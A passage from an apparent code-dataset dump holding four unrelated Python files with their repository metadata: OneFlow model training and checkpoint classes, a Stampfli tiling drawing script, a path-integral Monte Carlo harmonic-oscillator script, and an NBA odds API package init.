def validation_step(self, *args, **kwargs):
r"""Operates on a single batch of data from the validation set.
"""
raise NotImplementedError()
def configure_optimizers(self):
r"""Choose what optimizers and learning-rate schedulers to use in your optimization.
Normally you'd need one. But in the case of GANs or similar you might have multiple.
"""
raise NotImplementedError()
def fit(
self,
training_config: Optional[TrainingConfig] = None,
validation_config: Optional[ValidationConfig] = None,
checkpoint_config: Optional[CheckpointConfig] = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
max_steps: int = 100,
):
r""" Runs the full training and validation routine.
"""
self._max_steps = max_steps
api_clear_default_session()
self._sub_models = self._get_and_check_sub_models(
training_config, validation_config, checkpoint_config, callbacks
)
if len(self._sub_models) == 0:
return
if self._checkpoint_model.is_valid:
self._checkpoint_model.load()
for step_idx in range(0, self._max_steps):
for sub_model in self._sub_models:
try:
sub_model.step(step_idx)
except Exception as e:
print(
"Model step_idx {} {} failed.".format(step_idx, sub_model.name)
)
raise e
def method_overrided(self, method_name: str = None) -> bool:
return getattr(self.__class__, method_name) != getattr(Model, method_name)
def _get_and_check_sub_models(
self,
training_config: Optional[TrainingConfig] = None,
validation_config: Optional[ValidationConfig] = None,
checkpoint_config: Optional[CheckpointConfig] = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
sub_models = []
self._train_model = (
TrainModel(training_config, self, callbacks)
if self._is_deprecated_function_style
else TrainModelOOPStyle(training_config, self, callbacks)
)
if self._train_model.is_valid:
sub_models.append(self._train_model)
else:
if training_config is not None:
print(
self._train_model.error_msg,
"{}'s fit() will not do training.".format(self.__class__.__name__),
)
self._val_model = (
ValidateModel(validation_config, self, callbacks)
if self._is_deprecated_function_style
else ValidateModelOOPStyle(validation_config, self, callbacks)
)
if self._val_model.is_valid:
sub_models.append(self._val_model)
else:
if validation_config is not None:
print(
self._val_model.error_msg,
"{}'s fit() will not do validation.".format(
self.__class__.__name__
),
)
if len(sub_models) == 0:
print(
"{}'s fit() will do nothing because there has no valid configuration.".format(
self.__class__.__name__
)
)
return sub_models
self._checkpoint_model = (
CheckpointModel(checkpoint_config, self, callbacks)
if self._is_deprecated_function_style
else CheckpointModelOOPStyle(checkpoint_config, self, callbacks)
)
if self._checkpoint_model.is_valid:
sub_models.append(self._checkpoint_model)
else:
if checkpoint_config is not None:
print(
self._checkpoint_model.error_msg,
"{}'s fit() will not do checkpoint.".format(
self.__class__.__name__
),
)
return sub_models
class SubModel(ABC):
def __init__(self, name, cfg, model, callbacks):
self._cfg = cfg
assert isinstance(model, Model)
self._model = model
self._cbs = callbacks
self.name = name
self.is_valid = True
self.error_msg = (
self._model.__class__.__name__ + " " + self.name + " error message: "
)
if not self._get_and_check_cfg():
self.is_valid = False
if not self._get_and_check_cbs():
self.is_valid = False
def step(self, step_idx: int = 0):
raise NotImplementedError
def _get_and_check_cfg(self):
if self._cfg is None:
self.error_msg += "config is None;"
return False
if not self._cfg.check_valid():
self.error_msg += self._cfg.error_msg
return False
else:
return True
def _get_and_check_cbs(self):
if self._cbs is None:
self._cbs = []
return True
if isinstance(self._cbs, Callback):
self._cbs = [self._cbs]
return True
if isinstance(self._cbs, list):
for cb in self._cbs:
assert isinstance(
cb, Callback
), "model callbacks' type must be model.Callback or List[model.Callback]."
return True
assert (
False
), "model callbacks' type must be model.Callback or List[model.Callback]."
def _method_callback(self, method_name: str = None, *args, **kwargs):
for cb in self._cbs:
method = getattr(cb, method_name)
method(*args, **kwargs)
class TrainModel(SubModel):
def __init__(
self,
cfg: TrainingConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("training", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if not self._get_and_check_opts():
self.is_valid = False
if self.is_valid and not self._get_and_check_jobs():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid, self.error_msg
for optimizer_idx in range(0, len(self._opts)):
outputs = None
if self._is_numpy_input:
batch = None
if step_idx == 0:
batch = self._first_numpy_batch[optimizer_idx]
else:
batch = self._cfg.data(step_idx, optimizer_idx)
outputs = self._jobs[optimizer_idx](*batch).get()
else:
outputs = self._jobs[optimizer_idx]().get()
self._method_callback(
"on_training_step_end",
outputs=outputs,
step_idx=step_idx,
optimizer_idx=optimizer_idx,
)
def _get_and_check_step(self):
if not self._model.method_overrided("training_step"):
self.error_msg += "model.training_step() is empty;"
return False
else:
return True
def _get_and_check_opts(self):
self._opts = []
if not self._model.method_overrided("configure_optimizers"):
self.error_msg += "model.configure_optimizers() is empty;"
return False
opt_conf = self._model.configure_optimizers()
if isinstance(opt_conf, Optimizer):
self._opts = [opt_conf]
elif isinstance(opt_conf, (list, tuple)):
for opt in opt_conf:
assert isinstance(
opt, Optimizer
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
self._opts = opt_conf
else:
assert (
False
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
return True
def _get_and_check_jobs(self):
# TOOD(strint): rm numpy in sub-model
self._is_numpy_input = (
True if isinstance(self._cfg.data, NumpyDataModule) else False
)
self._jobs = []
if self._is_numpy_input:
self._first_numpy_batch = []
for optimizer_idx in range(0, len(self._opts)):
batch = self._cfg.data(0, optimizer_idx)
self._first_numpy_batch.insert(optimizer_idx, batch)
self._jobs.insert(
optimizer_idx, self._construct_numpy_job(batch, optimizer_idx)
)
else:
for optimizer_idx in range(0, len(self._opts)):
self._jobs.insert(optimizer_idx, self._construct_job(optimizer_idx))
return True
def _construct_job(self, optimizer_idx: int = 0):
def job():
batch = self._cfg.data(0, optimizer_idx)
outputs = self._model.training_step(
batch=batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
self._opts[optimizer_idx].minimize(loss)
return outputs
job.__name__ = (
self._model.__class__.__name__ + "_Model_train_job_" + str(optimizer_idx)
)
deco = api_oneflow_function(type="train", function_config=self._cfg.exe_cfg)
return deco(job)
def _construct_numpy_job(self, batch, optimizer_idx):
def job(*input_batch):
outputs = self._model.training_step(
batch=input_batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
self._opts[optimizer_idx].minimize(loss)
return outputs
_infer_job_signature(self._cfg.data, batch, optimizer_idx, job)
job.__name__ = (
self._model.__class__.__name__
+ "_Model_train_numpy_job_"
+ str(optimizer_idx)
)
deco = api_oneflow_function(type="train", function_config=self._cfg.exe_cfg)
return deco(job)
class ValidateModel(SubModel):
def __init__(
self,
cfg: ValidationConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("validation", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if self.is_valid and not self._get_and_check_job():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid
if (step_idx + 1) % self._cfg.step_interval == 0:
outputs = None
if self._is_numpy_input:
batch = None
if step_idx == 0:
batch = self._first_numpy_batch
else:
batch = self._cfg.data(step_idx, 0)
outputs = self._job(*batch).get()
else:
outputs = self._job().get()
self._method_callback(
"on_validation_step_end", step_idx=step_idx, outputs=outputs,
)
def _get_and_check_step(self):
if not self._model.method_overrided("validation_step"):
self.error_msg += "model.validation_step() is empty;"
return False
else:
return True
def _get_and_check_job(self):
# TOOD(strint): rm numpy in sub-model
self._is_numpy_input = (
True if isinstance(self._cfg.data, NumpyDataModule) else False
)
self._job = None
if not self._is_numpy_input:
self._job = self._construct_job()
else:
batch = self._cfg.data(0, 0)
self._first_numpy_batch = batch
self._job = self._construct_numpy_job(batch)
return True
def _construct_job(self):
def job():
batch = self._cfg.data(0, 0)
return self._model.validation_step(batch)
job.__name__ = self._model.__class__.__name__ + "_Model_eval_job"
deco = api_oneflow_function(type="predict", function_config=self._cfg.exe_cfg)
return deco(job)
def _construct_numpy_job(self, batch: Tuple[np.ndarray, ...] = None):
def job(*input_batch):
return self._model.validation_step(batch=input_batch)
_infer_job_signature(self._cfg.data, batch, 0, job)
job.__name__ = self._model.__class__.__name__ + "_Model_eval_numpy_job"
deco = api_oneflow_function(type="predict", function_config=self._cfg.exe_cfg)
return deco(job)
class CheckpointModel(SubModel):
def __init__(
self,
cfg: CheckpointConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("checkpointing", cfg, model, callbacks)
def load(self):
assert self.is_valid
if self._cfg.need_load:
self._load_checkpoint(self._cfg.load_dirpath)
def step(self, step_idx: int = 0):
assert self.is_valid
if self._cfg.need_save:
if (step_idx + 1) % self._cfg.save_step_interval == 0:
self._save_checkpoint(
dirpath=self._cfg.save_dirpath + "-" + str(step_idx)
)
def _load_checkpoint(
self, dirpath: str,
):
r"""Load model states from a checkpoint.
"""
LoadVariables(GetCheckpoint(path=dirpath))
def _save_checkpoint(
self, dirpath: str,
):
r"""Save model states as a checkpoint.
"""
SaveVarDict(path=dirpath)
class TrainModelOOPStyle(SubModel):
def __init__(
self,
cfg: TrainingConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("training", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
if not self._get_and_check_opts():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid, self.error_msg
for optimizer_idx in range(0, len(self._opts)):
batch = self._cfg.data(step_idx, optimizer_idx)
outputs = self._model.training_step(
batch=batch, optimizer_idx=optimizer_idx
)
loss = None
if isinstance(outputs, tuple) and len(outputs) > 0:
loss = outputs[0]
else:
loss = outputs
loss.backward()
opt = self._opts[optimizer_idx]
opt.step()
opt.zero_grad()
self._method_callback(
"on_training_step_end",
outputs=outputs,
step_idx=step_idx,
optimizer_idx=optimizer_idx,
)
def _get_and_check_step(self):
if not self._model.method_overrided("training_step"):
self.error_msg += "model.training_step() is empty;"
return False
else:
return True
def _get_and_check_opts(self):
self._opts = []
if not self._model.method_overrided("configure_optimizers"):
self.error_msg += "model.configure_optimizers() is empty;"
return False
opt_conf = self._model.configure_optimizers()
if isinstance(opt_conf, OOPOptimizer):
self._opts = [opt_conf]
elif isinstance(opt_conf, (list, tuple)):
for opt in opt_conf:
assert isinstance(
opt, OOPOptimizer
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
self._opts = opt_conf
else:
assert (
False
), "model.configure_optimizers() must return Optimizer \
or List[Optimizer, ...] or Tuple[Optimizer, ...]"
return True
class ValidateModelOOPStyle(SubModel):
def __init__(
self,
cfg: ValidationConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("validation", cfg, model, callbacks)
if not self._get_and_check_step():
self.is_valid = False
def step(self, step_idx: int = 0):
assert self.is_valid
if (step_idx + 1) % self._cfg.step_interval == 0:
outputs = None
with oneflow._oneflow_internal.autograd.no_grad():
inputs = self._cfg.data(step_idx, 0)
model_previous_mode = self._model.training
self._model.train()
outputs = self._model.validation_step(inputs)
self._model.train(model_previous_mode)
self._method_callback(
"on_validation_step_end", step_idx=step_idx, outputs=outputs,
)
def _get_and_check_step(self):
if not self._model.method_overrided("validation_step"):
self.error_msg += "model.validation_step() is empty;"
return False
else:
return True
class CheckpointModelOOPStyle(SubModel):
def __init__(
self,
cfg: CheckpointConfig = None,
model: Model = None,
callbacks: Optional[Union[Callback, List[Callback]]] = None,
):
super().__init__("checkpointing", cfg, model, callbacks)
def load(self):
assert self.is_valid
if self._cfg.need_load:
self._load_checkpoint(self._cfg.load_dirpath)
def step(self, step_idx: int = 0):
assert self.is_valid
if self._cfg.need_save:
if (step_idx + 1) % self._cfg.save_step_interval == 0:
self._save_checkpoint(
dirpath=self._cfg.save_dirpath + "-" + str(step_idx)
)
def _load_checkpoint(
self, dirpath: str,
):
r"""Load model states from a checkpoint.
"""
stat_dict = GetCheckpoint(path=dirpath)
self._model.load_state_dict(stat_dict)
def _save_checkpoint(
self, dirpath: str,
):
r"""Save model states as a checkpoint.
"""
stat_dict = self._model.state_dict()
SaveVarDict(path=dirpath, var_dict=stat_dict)
def _infer_job_signature(data_module, batch, optimizer_idx, job):
para_list = []
placeholder_list = data_module.infer_oneflow_data_placeholder(batch, optimizer_idx)
for i, placeholder in enumerate(placeholder_list):
para_name = (
data_module.__class__.__name__
+ "_opt_"
+ str(optimizer_idx)
+ "_para_"
+ str(i)
)
para_list.append(
inspect.Parameter(
name=para_name,
kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,
annotation=placeholder,
)
)
origin_sig = inspect.signature(job)
new_sig = origin_sig.replace(parameters=para_list)
job.__oneflow_function_signature__ = new_sig
|
[
"[email protected]"
] | |
fedbff6cef607c4f5ded4728ec4c5275e3036a1c
|
9380b3005eb777feb57d8b914091ab9e839e32fd
|
/stampfli.py
|
7bd02cf0b4d4e0e4f33fb696d4d7c6ae17175bc3
|
[] |
no_license
|
vitroid/StampfliTiling
|
57398f4aa269f0aeed502aedc0486f774e0c6792
|
cbc319216fca7f76912f26ab03b1402b9e188064
|
refs/heads/master
| 2022-05-02T06:55:39.049840 | 2011-09-22T23:43:28 | 2011-09-22T23:43:28 | 2,440,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,840 |
py
|
#Put the initial vertex
#subdivide with dodecagon and register new vertices
from math import *
blue = 1
red = -1
triangle_top = 0
triangle_left = 1
triangle_right = 2
theta = pi*15.0/180.0
ratio = 0.5 * tan(theta)
ratio2 = 0.5 / cos(theta)
matrix12 = ((cos(theta*2),sin(theta*2)),
(-sin(theta*2),cos(theta*2)))
def mul(mat,vec):
return ((mat[0][0]*vec[0]+mat[0][1]*vec[1]),
(mat[1][0]*vec[0]+mat[1][1]*vec[1]))
def add(vec1,vec2):
return (vec1[0]+vec2[0],vec1[1]+vec2[1])
def sub(vec1,vec2):
return (vec1[0]-vec2[0],vec1[1]-vec2[1])
def wrap(c):
return (c[0]-floor(c[0]/box[0]+0.5)*box[0],
c[1]-floor(c[1]/box[1]+0.5)*box[1])
def sub_pbc(vec1,vec2):
dx = vec1[0]-vec2[0]
dy = vec1[1]-vec2[1]
return wrap((dx,dy))
def drawpoly( coord ):
for i in range(len(coord)):
line(coord[i-1][0],coord[i-1][1],
coord[i ][0],coord[i ][1])
def subdiv_triangle(v):
for i in range(3):
dijx,dijy = edges[v[i]][v[i-1]]
dikx,diky = edges[v[i]][v[i-2]]
p = (coord[v[i]][0] + (dijx+dikx)*(0.5 - ratio / sqrt(3.0)),
coord[v[i]][1] + (dijy+diky)*(0.5 - ratio / sqrt(3.0)))
coord.append(p)
def subdiv_square(v):
for i in range(4):
#relative diagonal vector of the square
d = (edges[v[i]][v[i-1]][0]+edges[v[i-1]][v[i-2]][0],
edges[v[i]][v[i-1]][1]+edges[v[i-1]][v[i-2]][1])
p0 = (d[0]/sqrt(2)*ratio2,
d[1]/sqrt(2)*ratio2)
p = add(coord[v[i]],p0)
coord.append(p)
p1 = mul(matrix12,p0)
p = add(coord[v[i]],p1)
coord.append(p)
def hexagon(center,edge,parity):
r = edge * ratio * 2.0
for i in range(6):
coord.append(add(center,(r*cos((i*2+parity)*pi/6),r*sin((i*2+parity)*pi/6))))
def bond(coord,thres):
edges = dict()
for i in range(len(coord)):
edges[i] = dict()
for i in range(len(coord)):
for j in range(i+1,len(coord)):
dx,dy = sub_pbc(coord[j],coord[i])
if dx**2+dy**2 < thres**2 * 1.01:
edges[i][j] = (dx,dy)
edges[j][i] = (-dx,-dy)
return edges
def dictoflist_add(dol,key,value):
if not dol.has_key(key):
dol[key] = []
dol[key].append(value)
SAMECOLOR = 1
DIFFCOLOR = -1
def setcolors(en,ec,e,col):
if ec.has_key(e):
return
ec[e] = col
#print e,col
for i,j,parity in en[e]:
setcolors(en,ec,(i,j),col * parity)
def findrings(edges):
#look for rings
sq = []
tr = []
edgeneighbor = dict()
for i in edges:
for j in edges[i]:
for k in edges[i]:
if i < j and i < k and j < k:
if edges[j].has_key(k):
#must be compact
dx = edges[i][j][0] + edges[j][k][0] + edges[k][i][0]
dy = edges[i][j][1] + edges[j][k][1] + edges[k][i][1]
if abs(dx)<0.001 and abs(dy) < 0.001:
tr.append((i,j,k))
dictoflist_add(edgeneighbor,(i,j),(i,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,j),(j,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(j,k,SAMECOLOR))
dictoflist_add(edgeneighbor,(j,k),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(j,k),(i,k,SAMECOLOR))
else:
for l in edges[j]:
if edges[k].has_key(l):
if l > i:
if not edges[i].has_key(l):
#must be compact
dx = edges[i][j][0] + edges[j][l][0] + edges[l][k][0] + edges[k][i][0]
dy = edges[i][j][1] + edges[j][l][1] + edges[l][k][1] + edges[k][i][1]
if abs(dx)<0.001 and abs(dy) < 0.001:
sq.append((i,j,l,k))
kk,kl = k,l
if k > l:
kk,kl = l,k
jj,jl = j,l
if j > l:
jj,jl = l,j
dictoflist_add(edgeneighbor,(i,j),(i,k,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,k),(i,j,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,k),(kk,kl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(i,k,DIFFCOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(jj,jl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(kk,kl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,j),(jj,jl,DIFFCOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(i,j,DIFFCOLOR))
dictoflist_add(edgeneighbor,(i,j),(kk,kl,SAMECOLOR))
dictoflist_add(edgeneighbor,(i,k),(jj,jl,SAMECOLOR))
dictoflist_add(edgeneighbor,(kk,kl),(i,j,SAMECOLOR))
dictoflist_add(edgeneighbor,(jj,jl),(i,k,SAMECOLOR))
return tr,sq,edgeneighbor
def inflate(coord,edge,triangles,squares,depth):
clen = len(coord)
if depth == 0:
for i in range(clen):
hexagon(coord[i],edge,0) #ast number is the direction of hexagon
else:
for i in range(clen):
#hexagon(coord[i],edge,i%2) #ast number is the direction of hexagon
hexagon(coord[i],edge,0) #ast number is the direction of hexagon
for triangle in triangles:
subdiv_triangle(triangle)
for square in squares:
subdiv_square(square)
return coord
def draw(coord,edge,tr,sq,edgeneighbor):
i = 0
for c in coord:
stroke(0)
nofill()
x,y = wrap(c)
oval( x-4,y-4,8,8 )
nostroke()
fill(0)
oval( x-2,y-2,4,4 )
#text("%s" % i,c[0],c[1] )
i += 1
#return
edgecolors = dict()
i = edges.keys()[0]
j = edges[i].keys()[0]
if i > j:
i,j = j,i
setcolors(edgeneighbor,edgecolors,(i,j),red)
for i in edges:
for j in edges[i]:
if i < j:
dx,dy = edges[i][j]
ij = (coord[i][0]+dx*0.5,
coord[i][1]+dy*0.5)
x,y = wrap(ij)
if edgecolors[(i,j)] == red:
stroke(0)
nofill()
oval( x-3,y-3,6,6 )
stroke(0,1,1)
else:
nostroke()
fill(0)
oval( x-3,y-3,6,6 )
stroke(0.666,1,1)
x,y = wrap(coord[i])
line(x,y,x+dx,y+dy)
for i,j,k in tr:
dijx,dijy = edges[i][j]
dikx,diky = edges[i][k]
center = (coord[i][0]+(dijx+dikx)/3,
coord[i][1]+(dijy+diky)/3)
x,y = wrap(center)
if edgecolors[(i,j)] == red:
nostroke()
fill(0)
else:
stroke(0)
nofill()
oval(x-3,y-3,6,6)
#text("(%s,%s,%s)" % (i,j,k), center[0]+5,center[1]+5)
#print (i,j,k),center
for i,j,l,k in sq:
p = 3.0/8.0
q = 1.0/8.0
dijx,dijy = edges[i][j]
dikx,diky = edges[i][k]
dilx,dily = dijx+dikx, dijy+diky
ij = (coord[i][0] + dijx*p + dikx*q + dilx*q,
coord[i][1] + dijy*p + diky*q + dily*q)
ik = (coord[i][0] + dijx*q + dikx*p + dilx*q,
coord[i][1] + dijy*q + diky*p + dily*q)
jl = (coord[i][0] + dijx*p + dikx*q + dilx*p,
coord[i][1] + dijy*p + diky*q + dily*p)
kl = (coord[i][0] + dijx*q + dikx*p + dilx*p,
coord[i][1] + dijy*q + diky*p + dily*p)
if edgecolors[(i,j)] == red:
nostroke()
fill(0)
else:
stroke(0)
nofill()
x,y = wrap(ij)
oval(x-3,y-3,6,6)
x,y = wrap(kl)
oval(x-3,y-3,6,6)
if edgecolors[(i,j)] == blue:
nostroke()
fill(0)
else:
stroke(0)
nofill()
x,y = wrap(ik)
oval(x-3,y-3,6,6)
x,y = wrap(jl)
oval(x-3,y-3,6,6)
#text("(%s,%s,%s,%s)" % (i,j,l,k), ij[0],ij[1])
nofill()
stroke(0)
colormode(HSB)
#coord = [(100.0,100.0),(500.0,100.0),(300.0,450.0)]
#subdiv_triangle((0,1,2))
zoom = 100.0
translate(5*zoom,5*zoom)
p = zoom * sqrt(3)
box = (2*zoom + 2*p, 2*zoom + 2*p)
coord = [(zoom,0.0), (zoom+2*p,0.0), (zoom+p, zoom),
(0.0, p), (p,zoom+p), (2*zoom+p,zoom+p),
(0.0,p+2*zoom), (zoom+p,zoom+2*p)]
edge = 2*zoom
edges = bond(coord,edge)
triangles,squares,edgeneighbor = findrings(edges)
coord = inflate(coord,edge,triangles,squares,1)
edge *= 2*ratio
edges = bond(coord,edge)
triangles,squares,edgeneighbor = findrings(edges)
#coord = inflate(coord,edge,triangles,squares,1)
#edge *= 2*ratio
#edges = bond(coord,edge)
#triangles,squares,edgeneighbor = findrings(edges)
l=2*zoom*(1+sqrt(3))/(2*(2+sqrt(3)))
rect(-zoom,-l,2*zoom,l*2)
draw(coord,edge,triangles,squares,edgeneighbor)
print len(coord)
|
[
"[email protected]"
] | |
6655971d554a867325a97ca8bb88cc7028197341
|
ded10c2f2f5f91c44ec950237a59225e8486abd8
|
/.history/2/path_integral_naive_sampling_20200417194827.py
|
27213765902c7bcf85d6811029ac2960cb932a76
|
[] |
no_license
|
jearistiz/Statistical-Physics-Projects
|
276a86407b32ded4e06b32efb2fadbd8eff8daed
|
d9c5b16a50856e148dc8604d92b6de3ea21fc552
|
refs/heads/master
| 2022-11-05T03:41:23.623050 | 2020-06-28T06:36:05 | 2020-06-28T06:36:05 | 254,909,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,118 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
import matplotlib.pyplot as plt
from time import time
import pandas as pd
# Author: Juan Esteban Aristizabal-Zuluaga
# date: 202004151200
def rho_free(x,xp,beta):
"""Uso: devuelve elemento de matriz dsnsidad para el caso de una partícula libre en un toro infinito."""
return (2.*np.pi*beta)**(-0.5) * np.exp(-(x-xp)**2 / (2 * beta) )
def harmonic_potential(x):
"""Devuelve valor del potencial armónico para una posición x dada"""
return 0.5* x**2
def anharmonic_potential(x):
"""Devuelve valor de potencial anarmónico para una posición x dada"""
# return np.abs(x)*(1+np.cos(x)) #el resultado de este potencial es interesante
return 0.5*x**2 - x**3 + x**4
def QHO_canonical_ensemble(x,beta):
"""
Uso: calcula probabilidad teórica cuántica de encontrar al oscilador armónico
(inmerso en un baño térmico a temperatura inversa beta) en la posición x.
Recibe:
x: float -> posición
beta: float -> inverso de temperatura en unidades reducidas beta = 1/T.
Devuelve:
probabilidad teórica cuántica en posición x para temperatura inversa beta.
"""
return (np.tanh(beta/2.)/np.pi)**0.5 * np.exp(- x**2 * np.tanh(beta/2.))
def path_naive_sampling(N_path = 10,beta = 4., N_iter = int(1e5), delta = 0.5, potential = harmonic_potential, append_every = 1):
"""
Uso:
"""
dtau = beta/N_path
path_x = [0.] * N_path
pathss_x = [path_x[:]]
t_0 = time()
N_iter = int(N_iter)
for step in range(N_iter):
k = np.random.randint(0,N_path)
#Periodic boundary conditions
knext, kprev = (k+1) % N_path, (k-1) % N_path
x_new = path_x[k] + np.random.uniform(-delta,delta)
old_weight = ( rho_free(path_x[kprev],path_x[k],dtau) *
np.exp(- dtau * potential(path_x[k])) *
rho_free(path_x[k],path_x[knext],dtau) )
new_weight = ( rho_free(path_x[kprev],x_new,dtau) *
np.exp(- dtau * potential(x_new)) *
rho_free(x_new,path_x[knext],dtau) )
if np.random.uniform(0,1) < new_weight/old_weight:
path_x[k] = x_new
if step%append_every == 0:
pathss_x.append(path_x[:])
t_1 = time()
print('Path integral naive sampling: %d iterations -> %.2E seconds'%(N_iter,t_1-t_0))
pathss_x = np.array(pathss_x)
return pathss_x
def figures_fn( pathss_x, beta = 4 , N_plot = 201, x_max = 3, N_iter=int(1e5), append_every=1,
N_beta_ticks = 11, msq_file='file.csv', file_name='path-plot-prueba',
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=True):
script_dir=os.path.dirname(os.path.abspath(__file__))
x_plot = np.linspace(-x_max,x_max,N_plot)
# Agranda letra en texto de figuras generadas
plt.rc('text', usetex=True) #usa latex en texto de figuras
plt.rcParams.update({'font.size':15,'text.latex.unicode':True})
fig, ax1 = plt.subplots()
ax1.set_xlabel(u'$x$')
ax1.set_ylabel(u'$\pi^{(Q)} (x;\\beta)$')
lns1 = ax1.plot(x_plot,QHO_canonical_ensemble(x_plot,beta),label=u'Teórico')
if show_matrix_squaring:
msq_file = script_dir + '/' + msq_file
matrix_squaring_data = pd.read_csv(msq_file, index_col=0, comment='#')
lns2 = ax1.plot( matrix_squaring_data['position_x'],matrix_squaring_data['prob_density'],
label = u'Algoritmo Matrix\nSquaring')
lns3 = ax1.hist(pathss_x[:,0], bins=int(np.sqrt(N_iter/append_every)), normed=True,
label=u'Integral de camino\nnaive sampling')
ax1.tick_params(axis='y')
ax1.set_ylim(bottom=0)
ax1.set_xlim(-x_max,x_max)
if not show_path:
plt.legend(loc = 'best')
if save_plot:
plt.savefig(script_dir+'/'+file_name+'.eps')
if show_plot:
plt.show()
plt.close()
if show_path:
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel(u'$\\tau$') # we already handled the x-label with ax1
N_path = len(pathss_x[-1])
beta_plot = np.linspace(0,beta,N_path+1)
path_plot = list(pathss_x[-1])
path_plot.append(pathss_x[-1][0])
lns4 = ax2.plot(path_plot, beta_plot,'o-',c='k',label=u'Path')
ax2.tick_params(axis='y')
beta_ticks = np.linspace(0,beta,N_beta_ticks)
ax2.set_yticks(beta_ticks)
ax2.set_yticklabels(u'$%.2f$'%b for b in beta_ticks)
ax2.set_ylim(bottom=0)
ax2.set_xlim(-x_max,x_max)
# Solution for having legends that share two different scales
leg = lns1 + lns2 + [lns3[2][0]] + lns4
labs = [l.get_label() for l in leg]
ax1.legend(leg, labs, loc='best',title=u'$\\beta=%.2f$'%beta, fontsize=12)
fig.tight_layout() # otherwise the right y-label is slightly clipped
if save_plot:
plt.savefig(script_dir+'/'+file_name+'-path_true.eps')
if show_plot:
plt.show()
plt.close()
return 0
N_path = 10
beta = 4.
N_iter = int(1e4)
delta = 0.5
potential, potential_string = harmonic_potential, 'harmonic_potential'
append_every = 1
pathss_x = path_naive_sampling(N_iter=int(1e4))
#script_dir = os.path.dirname(os.path.abspath(__file__)) #path completa para este script
msq_file = 'pi_x-ms-harmonic_potential-x_max_5.000-nx_201-N_iter_7-beta_fin_4.000.csv'
N_plot = 201
x_max = 3
x_plot = np.linspace(-x_max,x_max,N_plot)
plot_file_name = 'pi_x-pi-plot-%s-x_max_%.3f-N_path_%d-N_iter_%d-beta_fin_%.3f'\
%(potential_string,x_max,N_path,N_iter,beta)
figures_fn( pathss_x, beta = beta , N_plot = N_plot, x_max = x_max, N_iter=N_iter,
N_beta_ticks = N_path+1, msq_file=msq_file, file_name=plot_file_name,
show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=False)
|
[
"[email protected]"
] | |
4d1fefe592c0fe8d3fc87942e60245cf88efc8b1
|
596e92d0d484b6e7eee6d322e72e52748fdeaa5d
|
/sportsdata/nba_odds/models/__init__.py
|
3deb348f2b98ad8e2c5f92f17542ca97f21454ec
|
[] |
no_license
|
scottypate/sportsdata
|
f5f61ddc7eb482883f93737c6ce73dd814ed4336
|
a07955ab50bf4fff1ce114ed9895095ff770c473
|
refs/heads/main
| 2023-08-18T16:51:56.452678 | 2021-10-22T12:44:08 | 2021-10-22T12:44:08 | 420,062,350 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,951 |
py
|
# coding: utf-8
# flake8: noqa
"""
NBA v3 Odds
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from sportsdata.nba_odds.models.nba_odds_betting_entity_metadata import NbaOddsBettingEntityMetadata
from sportsdata.nba_odds.models.nba_odds_betting_event import NbaOddsBettingEvent
from sportsdata.nba_odds.models.nba_odds_betting_market import NbaOddsBettingMarket
from sportsdata.nba_odds.models.nba_odds_betting_market_result import NbaOddsBettingMarketResult
from sportsdata.nba_odds.models.nba_odds_betting_market_split import NbaOddsBettingMarketSplit
from sportsdata.nba_odds.models.nba_odds_betting_outcome import NbaOddsBettingOutcome
from sportsdata.nba_odds.models.nba_odds_betting_outcome_result import NbaOddsBettingOutcomeResult
from sportsdata.nba_odds.models.nba_odds_betting_split import NbaOddsBettingSplit
from sportsdata.nba_odds.models.nba_odds_consensus_outcome import NbaOddsConsensusOutcome
from sportsdata.nba_odds.models.nba_odds_game import NbaOddsGame
from sportsdata.nba_odds.models.nba_odds_game_betting_split import NbaOddsGameBettingSplit
